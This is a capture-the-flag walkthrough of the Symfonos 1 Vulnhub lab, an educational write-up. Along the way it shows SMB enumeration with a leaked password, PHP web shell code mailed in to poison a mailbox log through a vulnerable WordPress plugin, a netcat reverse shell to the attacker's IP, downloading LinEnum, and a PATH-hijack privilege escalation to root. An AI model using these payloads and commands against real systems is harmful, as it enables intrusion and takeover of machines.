Symfonos 1

Symfonos 1 Vulnhub Walkthrough

Enumeration

nmap

nmap -sC -sV -oA nmap/sym1 192.168.1.112
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 06:26 EDT
Nmap scan report for 192.168.1.112
Host is up (0.00017s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:04:0F:D1 (VMware)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2020-05-15T05:27:13-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-15T10:27:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds

When I put the IP to the browser and it shows this

Nothing interesting with dirb either, let's use enum4linux to see what can we find

enum4linux

As we can see here, we have 2 share folders named helios and anonymous that we can check them out

smbclient

We can type

smbclient //192.168.1.112/anonymoys, then with no password, we can login.

Then, type ls to show anything inside that server.

Then we can type get attention.txt to download the file.

Then, we can cat the file, to show the text inside

This might be the password for the helios sharefolder

So then in the terminal, type

smbclient //192.168.1.112/helios -U helios then password is qwerty

List the files again using ls and we got 2 text files, research.txt and todo.txt

Open those 2 text files and we got this

we can see that there is a /h3l105 at the end of the todo.txt then we can put it inside the web browser just now.

We can see the site is not load up properly, immediately I know that we need to add the IP to the /etc/hosts

Reload the webpage

We can see that this is powered by WordPress, so we use wpscan to enumerate the WordPress website to find whether it has any vulnerabilities.

wpscan

we type this inside the terminal

It is recommend to use symfonos.local that we created at /etc/hosts because we might miss anything important while scanning using wpscan

p stands for popular plugins

Exploit

After Googling for awhile, I found out that mail-masta is actually vulnerable to Remote Code Execution (RCE), we can find it at exploit-db.

Replace the URL with the query provided the we will get this

From here, we can know that there is a user is called helios

I know from here that postfix store their mail at /var/mail/username

curl

Log Poisoning via Mail

We can actually send a php code to the victim to get a shell

telnet

By using telnet, we can type

Then we can type

MAIL FROM:<choo>

RCPT TO:helios

data

<?php system($_GET['cmd']); ?>

.

After that go back to the browser and replace /var/mail/helios&cmd=id after the pl=

We can see it successfully get a shell!

Reverse Shell

type nc -nlvp 4444 at our machine and then nc -e /bin/bash 192.168.43.182 4444 at the URL

Got a connection !

Then we need to type

python -c 'import pty; pty.spawn("/bin/bash")' to get a proper shell.

Privilege Escalation

LinEnum

You can download the script at here

Then we can fire up our python to create a server by typing

python -m SimpleHTTPServer

Then at the victim's machine, we can type wget 192.168.43.182:8000/LinEnum.sh

After that, chmod +x LinEnum.sh to make it executable. Type ./LinEnum.sh to run the script

PATH variable exploit

As we can see at the SUID files for the enumeration by LinEnum.sh , we can see that /opt/statuscheck is very suspicious.

After running it, we can see that this content is generated by curl. then we use strings command to show what's inside the binary file

As we can see here we have a curl command here, if we run curl -I http://localhost, we will get something familiar

We then can modify the content inside of curl and use PATH variable to make the exploit working

We first head to /tmp folder.

Then type

echo "/bin/sh" >> curl

Then we can chmod 777 curl

then add the path by typing

export PATH=/tmp:$PATH

Then we can run /opt/statuscheck

We got the root !

Navigate to /root to get the flag

Congratulation!

PreviousSymfonosNextSymfonos 2

Last updated

Was this helpful?